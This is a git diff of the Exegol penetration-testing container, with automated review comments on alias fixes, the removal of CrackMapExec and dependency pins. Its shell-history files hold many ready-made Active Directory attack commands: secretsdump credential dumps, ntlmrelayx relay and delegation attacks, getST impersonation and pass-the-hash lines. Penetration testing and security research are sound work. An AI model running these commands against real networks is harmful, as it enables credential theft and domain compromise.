@@ -275,6 +275,14 @@ function _trust_ca_cert_in_firefox() { certutil -A -n "$2" -t "TC" -i "$1" -d ~/.mozilla/firefox/*.Exegol } +function deploy_arsenal_cheatsheet () { +# Function to add custom cheatsheets into arsenal + colorecho "Deploying custom arsenal cheatsheet" + if [[ ! -d "$MY_SETUP_PATH/arsenal-cheats" ]]; then + mkdir -p "$MY_SETUP_PATH/arsenal-cheats" + fi +} + # Starting # This procedure is supposed to be executed only once at the first startup, using a lockfile check @@ -292,6 +300,7 @@ deploy_python3 deploy_firefox_addons deploy_bloodhound trust_ca_certs_in_firefox +deploy_arsenal_cheatsheet run_user_setup diff --git a/sources/assets/grc/conf.cme b/sources/assets/grc/conf.cme deleted file mode 100644 index 47576d235..000000000 --- a/sources/assets/grc/conf.cme +++ /dev/null @@ -1,16 +0,0 @@ -# Signing True -regexp=signing\:True -colours=bold green -======= -# Signing False -regexp=signing\:False -colours=bold red -======= -# SMB1 True -regexp=SMBv1\:True -colours=yellow -======= -# SMBv1 False -regexp=SMBv1\:False -colours=blue -======= \ No newline at end of file diff --git a/sources/assets/grc/grc.conf b/sources/assets/grc/grc.conf index 1f6d52dd6..8156df4cf 100644 --- a/sources/assets/grc/grc.conf +++ b/sources/assets/grc/grc.conf @@ -1,7 +1,3 @@ -# cme -(^|[/\w\.]+/)g?crackmapexec\s? -conf.cme - # rbcd (^|[/\w\.]+/)g?rbcd.py\s? conf.rbcd diff --git a/sources/assets/shells/aliases.d/adminer b/sources/assets/shells/aliases.d/adminer new file mode 100644 index 000000000..ba5f13447 --- /dev/null +++ b/sources/assets/shells/aliases.d/adminer @@ -0,0 +1 @@ +alias adminer=AD-miner \ No newline at end of file diff --git a/sources/assets/shells/aliases.d/crackmapexec b/sources/assets/shells/aliases.d/crackmapexec deleted file mode 100644 index 824111b7c..000000000 --- a/sources/assets/shells/aliases.d/crackmapexec +++ /dev/null 
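Review bot: `deploy_arsenal_cheatsheet` only creates `$MY_SETUP_PATH/arsenal-cheats`; nothing is copied or linked into arsenal, so the log line `Deploying custom arsenal cheatsheet` and the comment `Function to add custom cheatsheets into arsenal` promise more than the function does, and a reader will assume the deployment step exists. If this is the intended scope, the comment should say `Create the arsenal-cheats directory in the user setup path so custom cheatsheets can be dropped there`; if not, the copy step is still missing. The `if [[ ! -d ... ]]` guard is redundant because `mkdir -p` already succeeds on an existing directory, and the comment sits at column 0 inside the function body unlike the indented lines around it; `$MY_SETUP_PATH` is defined outside the hunk, so whether it can be empty (which would create `/arsenal-cheats`) cannot be checked here.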
@@ -1,2 +0,0 @@
-alias cme-neo4j-enable='sed -i "s/bh_enabled = False/bh_enabled = True/" ~/.cme/cme.conf'
-alias cme-neo4j-disable='sed -i "s/bh_enabled = True/bh_enabled = False/" ~/.cme/cme.conf'
\ No newline at end of file
diff --git a/sources/assets/shells/aliases.d/metasploit b/sources/assets/shells/aliases.d/metasploit
index 78ea8c1b0..591bc8fc4 100644
--- a/sources/assets/shells/aliases.d/metasploit
+++ b/sources/assets/shells/aliases.d/metasploit
@@ -1,10 +1,10 @@ -alias msfconsole='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfconsole' -alias msfd='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfd' +alias msfconsole='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfconsole' +alias msfd='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfd' +alias msfrpc='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfrpc' +alias msfrpcd='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfrpcd' +alias msfupdate='cd /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfupdate; cd -' +alias msfvenom='BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfvenom' msfdb_func() { - sudo -u postgres sh -c "cd /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb $@" + sudo -u postgres sh -c "BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb $@" } -alias msfdb='msfdb_func' -alias msfrpc='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfrpc' -alias msfrpcd='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfrpcd' -alias 
msfupdate='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfupdate' -alias msfvenom='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfvenom' +alias msfdb='msfdb_func' \ No newline at end of file diff --git a/sources/assets/shells/aliases.d/netexec b/sources/assets/shells/aliases.d/netexec index a06f77142..c2038f304 100644 --- a/sources/assets/shells/aliases.d/netexec +++ b/sources/assets/shells/aliases.d/netexec @@ -1,2 +1,4 @@ alias netexec-neo4j-enable='sed -i "s/bh_enabled = False/bh_enabled = True/" ~/.nxc/nxc.conf' -alias netexec-neo4j-disable='sed -i "s/bh_enabled = True/bh_enabled = False/" ~/.nxc/nxc.conf' \ No newline at end of file +alias netexec-neo4j-disable='sed -i "s/bh_enabled = True/bh_enabled = False/" ~/.nxc/nxc.conf' +alias crackmapexec='echo "crackmapexec has been replaced with netexec"' +alias cme=crackmapexec \ No newline at end of file diff --git a/sources/assets/shells/aliases.d/pywhisker b/sources/assets/shells/aliases.d/pywhisker deleted file mode 100644 index 1eaf99d7e..000000000 --- a/sources/assets/shells/aliases.d/pywhisker +++ /dev/null @@ -1 +0,0 @@ -alias pywhisker.py='/opt/tools/pywhisker/venv/bin/python3 /opt/tools/pywhisker/pywhisker.py' diff --git a/sources/assets/shells/aliases.d/responder b/sources/assets/shells/aliases.d/responder index dfdfa7c85..e879929fb 100644 --- a/sources/assets/shells/aliases.d/responder +++ b/sources/assets/shells/aliases.d/responder 
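Review bot: In the rewritten `msfdb_func`, `$@` is expanded inside the double-quoted string handed to `sh -c`, and a POSIX shell expands `"... $@"` into separate fields: with two or more arguments only the first stays in the command string and the remaining ones become positional parameters of the inner `sh`, so they never reach msfdb (a single-argument call works, which is why this may have gone unnoticed). Passing them positionally keeps them intact: `sudo -u postgres sh -c 'BUNDLE_GEMFILE=/opt/tools/metasploit-framework/Gemfile /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb "$@"' sh "$@"`. The `/usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle` path is now repeated in seven places; one variable at the top of the file would make the next Ruby bump a one-line change. `msfupdate` also runs `cd -` even when the first `cd` failed, since `;` separates them.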
@@ -1,8 +1,8 @@
 function MultiRelay.py { (cd /opt/tools/Responder/tools/ && /opt/tools/Responder/venv/bin/python3 /opt/tools/Responder/tools/MultiRelay.py "$@") }
 alias RunFinger.py='/opt/tools/Responder/venv/bin/python3 /opt/tools/Responder/tools/RunFinger.py'
 alias Responder.py='/opt/tools/Responder/venv/bin/python3 /opt/tools/Responder/Responder.py'
-alias responder-http-on="sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='"
-alias responder-http-off="sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='"
-alias responder-smb-on="sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='"
-alias responder-smb-off="sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='"
+alias responder-http-on="sed -i -E 's/^HTTP( +)= Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='"
+alias responder-http-off="sed -i -E 's/^HTTP( +)= On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='"
+alias responder-smb-on="sed -i -E 's/^SMB( +)= Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='"
+alias responder-smb-off="sed -i -E 's/^SMB( +)= On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='"
 alias responder="Responder.py"
\ No newline at end of file
diff --git a/sources/assets/shells/aliases.d/volatility3 b/sources/assets/shells/aliases.d/volatility3
index 83e6b3111..ed951a559 100644
--- a/sources/assets/shells/aliases.d/volatility3
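Review bot: The four new sed expressions declare a capture group `( +)` that the replacement never references, so `-E` buys nothing over a plain `' +'`; either drop the parentheses (`'s/^HTTP +=\s*Off/HTTP = On/'`-style without the group) or reference `\1` deliberately, bearing in mind that preserving the original spacing would then make the trailing `grep 'HTTP ='` miss lines with more than one space. The `cat ... | grep` tail is a useless use of cat and reads better as `grep --color=never 'HTTP =' /opt/tools/Responder/Responder.conf`. The new `^` anchor means an indented or prefixed `HTTP =` line is no longer rewritten, which looks intentional but is worth a short comment in the alias file.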
+++ b/sources/assets/shells/aliases.d/volatility3
@@ -1,2 +1,3 @@
+alias vol='/opt/tools/volatility3/venv/bin/python3 /opt/tools/volatility3/venv/bin/vol'
 alias volatility3='vol'
 alias vol3='volatility3'
diff --git a/sources/assets/shells/history.d/adminer b/sources/assets/shells/history.d/adminer
new file mode 100644
index 000000000..6f93b70cd
--- /dev/null
+++ b/sources/assets/shells/history.d/adminer
@@ -0,0 +1,2 @@
+AD-miner -c -cf My_Report u $USERNAME -p $PASSWORD
+adminer -c -cf My_Report -u $USERNAME -p $PASSWORD
\ No newline at end of file
diff --git a/sources/assets/shells/history.d/crackmapexec b/sources/assets/shells/history.d/crackmapexec
deleted file mode 100644
index ed4af65c7..000000000
--- a/sources/assets/shells/history.d/crackmapexec
+++ /dev/null
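Review bot: The first adminer history entry `AD-miner -c -cf My_Report u $USERNAME -p $PASSWORD` is missing the dash on the `u` option, so replaying it passes `u` and the username as bare positional arguments instead of `-u $USERNAME`; the second entry in the same hunk has the correct form. Change it to `AD-miner -c -cf My_Report -u $USERNAME -p $PASSWORD`. How AD-miner reacts to the stray positionals cannot be confirmed from here, but the two entries are clearly meant to be the same invocation under the two names.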
@@ -1,42 +0,0 @@ -crackmapexec smb --list-modules -crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq -crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST" -crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST" -crackmapexec smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt -crackmapexec smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt -crackmapexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts -crackmapexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz -crackmapexec smb "$TARGET" -u '' -p '' --pass-pol -crackmapexec smb 192.168.56.0/24 --gen-relay-list smb_targets.txt -crackmapexec smb 192.168.56.0/24 --local-auth -u '' -p '' -crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users -crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions -crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares -crackmapexec smb 192.168.56.0/24 -u '' -p '' --shares -crackmapexec smb "$IP" -u "$USER" -p "$PASSWORD" -M noPac -crackmapexec smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam -crackmapexec smb "$IP" -u '' -p '' -M zerologon -crackmapexec smb "$IP" -u '' -p '' -M ms17-010 -crackmapexec smb "$IP" -u '' -p '' -M ioxidresolver -cme smb --list-modules -cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq -cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST" -cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST" -cme smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt -cme smb "$TARGET" 
--continue-on-success -u users.txt -p passwords.txt -cme smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts -cme smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz -cme smb "$TARGET" -u '' -p '' --pass-pol -cme smb 192.168.56.0/24 --gen-relay-list smb_targets.txt -cme smb 192.168.56.0/24 --local-auth -u '' -p '' -cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users -cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions -cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares -cme smb 192.168.56.0/24 -u '' -p '' --shares -cme smb "$IP" -u "$USER" -p "$PASSWORD" -M noPac -cme smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam -cme smb "$IP" -u '' -p '' -M zerologon -cme smb "$IP" -u '' -p '' -M ms17-010 -cme smb "$IP" -u '' -p '' -M ioxidresolver diff --git a/sources/assets/shells/history.d/gobuster b/sources/assets/shells/history.d/gobuster index 79d3ef460..38f45365c 100644 --- a/sources/assets/shells/history.d/gobuster +++ b/sources/assets/shells/history.d/gobuster @@ -1,2 +1,4 @@ gobuster dir -w `fzf-wordlists` -t 20 -x php,txt,pl,sh,asp,aspx,html,json,py,cfm,rb,cgi,bak,tar.gz,tgz,zip -u "http://$TARGET/" gobuster dir -w `fzf-wordlists` -u http://192.168.56.0:8000/ +gobuster dns -d "$TARGET" -w `fzf-wordlists` +gobuster vhost -u "$TARGET" -w `fzf-wordlists` --append-domain diff --git a/sources/assets/shells/history.d/impacket b/sources/assets/shells/history.d/impacket index 9cf38f6e1..56d341ce5 100644 --- a/sources/assets/shells/history.d/impacket +++ b/sources/assets/shells/history.d/impacket 
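Review bot: The new vhost entry passes `"$TARGET"` straight to `-u`, while the existing first line treats `$TARGET` as a bare host and builds `"http://$TARGET/"` from it. Whether gobuster accepts a scheme-less value here depends on the version, so `gobuster vhost -u "http://$TARGET/" -w \`fzf-wordlists\` --append-domain` is the safer form. The `dns` line is consistent with the rest of the file.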
@@ -3,21 +3,36 @@ reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" save -keyName 'HKLM\SAM' -o '\\19 reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" save -keyName 'HKLM\SYSTEM' -o '\\192.168.56.1\SHUTDOWN' reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" save -keyName 'HKLM\SECURITY' -o '\\192.168.56.1\SHUTDOWN' reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" backup -o '\\192.168.56.1\SHUTDOWN' -secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL smbserver.py -smb2support EXEGOL . -KRB5CCNAME='DC01.ccache' getST.py -self -impersonate 'domainadmin' -k -no-pass -dc-ip "$DC_HOST" "$DOMAIN"/"$DC_HOST" +secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL +secretsdump -ntds ntds.dit.save -system system.save LOCAL +secretsdump -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" +secretsdump -k "$TARGET" +secretsdump -k -outputfile "$DOMAIN" "$DC_HOST" +secretsdump -ldapfilter '(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))' -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" +secretsdump -ldapfilter '(&(objectClass=user)(adminCount=1))' -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 "$DOMAIN"/Administrator@"$DC_HOST" +secretsdump -no-pass "$DOMAIN"/'DC01$'@"$DC_HOST" +secretsdump -outputfile "$DOMAIN" -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" +secretsdump -just-dc-user krbtgt -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" KRB5CCNAME='domainadmin.ccache' secretsdump -just-dc-user 'krbtgt' -dc-ip "$DC_HOST" -k -no-pass @"$DC_HOST" +KRB5CCNAME='DC01.ccache' getST.py -self -impersonate 'domainadmin' -k -no-pass -dc-ip "$DC_HOST" "$DOMAIN"/"$DC_HOST" +getST.py -self -impersonate 'domainadmin' -k -no-pass -dc-ip "$DC_HOST" "$DOMAIN"/"$DC_HOST" +getST.py -spn "host/$TARGET" -impersonate 'domainadmin' -dc-ip "$DC_IP" "$DOMAIN"/'EXEGOL-01$':'exegol4thewin' +getST.py -spn CIFS/"$TARGET" -impersonate Administrator -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD" +getTGT.py 
-dc-ip "$DC_HOST" "$DOMAIN"/"$USER":"$PASSWORD" renameMachine.py -current-name 'testcomputer$' -new-name 'DC01' -dc-ip "$DC_HOST" "$DOMAIN"/"$USER":"$PASSWORD" -getTGT.py -dc-ip "$DC_HOST" "$DOMAIN"/'DC01':'123pentest' renameMachine.py -current-name 'DC01' -new-name 'testcomputer$' -dc-ip "$DC_HOST" "$DOMAIN"/"$USER":"$PASSWORD" -ntlmrelayx -t "http://pki.$DOMAIN/certsrv/certfnsh.asp" --adcs -ntlmrelayx -t ldap://"$DC_HOST" -smb2support --remove-mic --shadow-credentials --shadow-target 'dc01$' +ntlmrelayx -t "https://pki.$DOMAIN/certsrv/certfnsh.asp" -smb2support --adcs --template "KerberosAuthentication" +ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --remove-mic --shadow-credentials --shadow-target 'dc01$' ntlmrelayx -t dcsync://"$DC_HOST" -smb2support +ntlmrelayx -t "ldaps://$DC_HOST" --http-port 80 --no-dump --no-smb-server --delegate-access --escalate-user 'EXEGOL-01$' +ntlmrelayx -t ldaps://"$DC_HOST" --http-port 80 --no-dump --no-smb-server --delegate-access --add-computer 'EXEGOL-01' 'exegol4thewin' +ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --remove-mic --delegate-access --add-computer 'EXEGOL-01' 'exegol4thewin' +ntlmrelayx -t ldap://"$DC_HOST" -smb2support --interactive +ntlmrelayx -tf targets.txt -w --ipv6 -smb2support --lootdir ntlmrelayx_lootdir --http-port 3128,80 Get-GPPPassword -debug -no-pass "$DC_HOST" Get-GPPPassword "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST" ms14-068.py -u "$USER"@"$DOMAIN" --rc4 "$NT_HASH" -s "$DOMAIN_SID" -d "$DC_HOST" -getST.py -k -no-pass -spn host/"$DC_HOST" "$DOMAIN"/"$USER" -secretsdump -ntds ntds.dit.save -system system.save LOCAL GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip "$DC_IP" "$DOMAIN"/ GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD" GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip "$DC_IP" "$DOMAIN"/"$USER" 
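Review bot: The added ntlmrelayx lines quote the target two different ways on adjacent lines — `-t "ldaps://$DC_HOST"` on the `--escalate-user` line and `-t ldaps://"$DC_HOST"` on the others — and the two `getST.py -self -impersonate 'domainadmin'` entries differ only by the `KRB5CCNAME=` prefix. Picking one quoting form for the block and keeping a single `getST.py -self` entry would make the history easier to scan. The `secretsdump … -ldapfilter '(&(objectClass=user)(adminCount=1))'` entry carries a literal hash where its neighbours use `"$NT_HASH"`; it was moved rather than written by this commit, but is worth normalising to the variable while the block is being reorganised.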
@@ -36,14 +51,6 @@ ticketer.py -nthash "$NT_HASH" -spn HOST/"$TARGET" -domain-sid "$DOMAIN_SID" -do smbclient.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" smbexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" smbexec.py -share 'ADMIN$' -k "$TARGET" -secretsdump -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" -secretsdump -just-dc-user krbtgt -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" -secretsdump -k "$TARGET" -secretsdump -k -outputfile "$DOMAIN" "$DC_HOST" -secretsdump -ldapfilter '(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))' -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" -secretsdump -ldapfilter '(&(objectClass=user)(adminCount=1))' -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 "$DOMAIN"/Administrator@"$DC_HOST" -secretsdump -no-pass "$DOMAIN"/'DC01$'@"$DC_HOST" -secretsdump -outputfile "$DOMAIN" -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" rpcdump.py "$DC_HOST" | grep -A 6 MS-RPRN rbcd.py -delegate-from "$USER" -delegate-to 'sv01$' -dc-ip "$DC_IP" -action remove "$DOMAIN"/"$USER":"$PASSWORD" rbcd.py -delegate-from "$USER" -delegate-to 'sv01$' -dc-ip "$DC_IP" -action write "$DOMAIN"/"$USER":"$PASSWORD" 
@@ -52,17 +59,10 @@ proxychains psexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" proxychains secretsdump -no-pass "$DOMAIN"/"$USER"@"$TARGET" proxychains smbexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" proxychains wmiexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" -psexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" proxychains atexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" proxychains dcomexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" -ntlmrelayx -t ldap://"$DC_HOST" -smb2support --escalate-user 'EXEGOL-01$' -ntlmrelayx -t ldap://"$DC_HOST" -smb2support --interactive -ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --add-computer 'EXEGOL-01' 'exegol4thewin' --delegate-access -ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --remove-mic --add-computer 'EXEGOL-01' 'exegol4thewin' --delegate-access -ntlmrelayx -tf targets.txt -w --ipv6 -smb2support --lootdir ntlmrelayx_lootdir --http-port 3128,80 lookupsid.py -hashes :"$NT_HASH" "$DOMAIN"/Administrator@"$DC_HOST" 0 -getST.py -spn "host/$TARGET" -impersonate 'domainadmin' -dc-ip "$DC_IP" "$DOMAIN"/'EXEGOL-01$':'exegol4thewin' -getST.py -spn CIFS/"$TARGET" -impersonate Administrator -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD" +psexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" atexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" diff --git a/sources/assets/shells/history.d/metasploit b/sources/assets/shells/history.d/metasploit new file mode 100644 index 000000000..3782f8968 --- /dev/null +++ b/sources/assets/shells/history.d/metasploit @@ -0,0 +1 @@ +service postgresql start diff --git a/sources/assets/shells/history.d/pywhisker b/sources/assets/shells/history.d/pywhisker index 25c0fcb5d..14e6aaab4 100644 --- a/sources/assets/shells/history.d/pywhisker +++ b/sources/assets/shells/history.d/pywhisker 
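Review bot: After this hunk the region still holds two identical `dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"` context lines directly after the re-added `psexec.py` entry. They predate the commit, but since the commit is already deduplicating and regrouping this file, dropping one of them here is in scope.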
@@ -1 +1 @@ -pywhisker.py -v -d "$DOMAIN" -u "$USER" -H "$NT_HASH" -t 'sv01$' -a 'add' +pywhisker -v -d "$DOMAIN" -u "$USER" -H "$NT_HASH" -t 'sv01$' -a 'add' diff --git a/sources/install/package_ad.sh b/sources/install/package_ad.sh index fb3af817e..14fdd4943 100644 --- a/sources/install/package_ad.sh +++ b/sources/install/package_ad.sh @@ -101,21 +101,6 @@ function install_ldapdomaindump() { add-to-list "ldapdomaindump,https://github.com/dirkjanm/ldapdomaindump,A tool for dumping domain data from an LDAP service" } -function install_crackmapexec() { - colorecho "Installing CrackMapExec" - git -C /opt/tools/ clone --depth 1 https://github.com/Porchetta-Industries/CrackMapExec - pipx install --system-site-packages /opt/tools/CrackMapExec/ - mkdir -p ~/.cme - [[ -f ~/.cme/cme.conf ]] && mv ~/.cme/cme.conf ~/.cme/cme.conf.bak - cp -v /root/sources/assets/crackmapexec/cme.conf ~/.cme/cme.conf - # below is for having the ability to check the source code when working with modules and so on - cp -v /root/sources/assets/grc/conf.cme /usr/share/grc/conf.cme - add-aliases crackmapexec - add-history crackmapexec - add-test-command "crackmapexec --help" - add-to-list "crackmapexec,https://github.com/Porchetta-Industries/CrackMapExec,Network scanner." -} - function install_bloodhound-py() { colorecho "Installing and Python ingestor for BloodHound" pipx install --system-site-packages git+https://github.com/fox-it/BloodHound.py @@ -191,6 +176,7 @@ function install_bloodhound-ce() { cd /opt/tools/BloodHound-CE/src/packages/javascript/bh-shared-ui || exit zsh -c "source ~/.zshrc && nvm install 18 && nvm use 18 && yarn install --immutable && yarn build" cd /opt/tools/BloodHound-CE/src/ || exit + asdf local golang 1.23.0 catch_and_retry VERSION=v999.999.999 CHECKOUT_HASH="" python3 ./packages/python/beagle/main.py build --verbose --ci # Ingestors: bloodhound-ce requires the ingestors to be in a specific directory and checks that when starting, they need to be downloaded here 
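Review bot: `asdf local golang 1.23.0` writes a `.tool-versions` file into `/opt/tools/BloodHound-CE/src/` and assumes 1.23.0 was installed earlier by install_go in package_base.sh, where that install currently sits inside a dated temp-fix block; if that block is later removed the failure surfaces here at build time rather than at the pin. A comment making the dependency explicit, `# go 1.23.0 is installed by install_go (package_base.sh); keep both in sync`, is cheap insurance. The function body continues outside the hunk.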
@@ -440,7 +426,7 @@ function install_pypykatz() { colorecho "Installing pypykatz" # without following fix, tool raises "oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto" # see https://github.com/wbond/oscrypto/issues/78 and https://github.com/wbond/oscrypto/issues/75 - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -679,7 +665,7 @@ function install_pygpoabuse() { pip3 install -r requirements.txt # without following fix, tool raises "oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto" # see https://github.com/wbond/oscrypto/issues/78 and https://github.com/wbond/oscrypto/issues/75 - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -782,7 +768,7 @@ function install_pkinittools() { pip3 install -r requirements.txt # without following fix, tool raises "oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto" # see https://github.com/wbond/oscrypto/issues/78 and https://github.com/wbond/oscrypto/issues/75 - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else 
